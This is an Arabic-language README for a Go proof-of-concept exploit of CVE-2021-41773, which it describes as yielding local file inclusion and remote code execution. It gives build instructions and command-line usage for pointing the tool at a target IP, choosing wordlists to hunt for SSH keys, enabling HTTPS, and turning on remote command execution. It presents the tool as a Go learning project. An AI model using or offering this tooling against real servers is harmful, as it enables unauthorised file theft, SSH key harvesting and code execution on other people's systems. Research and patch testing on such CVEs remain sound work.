
يحتوي هذا المستودع على Proof-of-Concept لـ CVE-2021-41773. تحتوي هذه الـ CVE على ثغرات LFI و RCE.
يحتوي هذا المستودع على إثبات المفهوم (PoC) لـ CVE-2021-41773. يكشف هذا الثغرة عن تضمين الملفات المحلية (LFI) وتنفيذ التعليمات البرمجية عن بُعد (RCE).
تأكد من تثبيت إصدار Go 1.23.0.
قم ببناء الملف الثنائي للاستغلال باستخدام الأمر التالي:
go build -o exploit
تحديد IP الهدف: استخدم العلم -i لتحديد عنوان IP الهدف (بما في ذلك المنفذ). هذا مطلوب.
./exploit -i 10.0.0.1:8080
تحديد حجم قائمة كلمات SSH: استخدم العلم -l لاختيار حجم قائمة كلمات SSH.
الخيارات:
0: صغير (افتراضي)1: متوسط2: كبير./exploit -i 10.0.0.1:8080 -l 1
تفعيل HTTPS: استخدم العلم -ssl لتفعيل HTTPS (الافتراضي هو HTTP). هذا العلم اختياري.
./exploit -i 10.0.0.1:8080 -ssl
تحديد قائمة كلمات مخصصة لمفاتيح SSH: استخدم العلم -k لتوفير قائمة كلمات مخصصة لمفاتيح SSH. هذا العلم اختياري.
./exploit -i 10.0.0.1:8080 -k /usr/share/wordlist/SecLists/Discovery/Web-Content/quickhits.txt
تفعيل تنفيذ التعليمات البرمجية عن بُعد (RCE): استخدم العلم -rce لتنفيذ الأوامر عن بُعد. هذا العلم اختياري.
./exploit -i 10.0.0.1:8080 -rce
أردت كتابة شيء بلغة Golang وتعلم اللغة.
هذا أول برنامج كامل أكتبه بلغة Golang.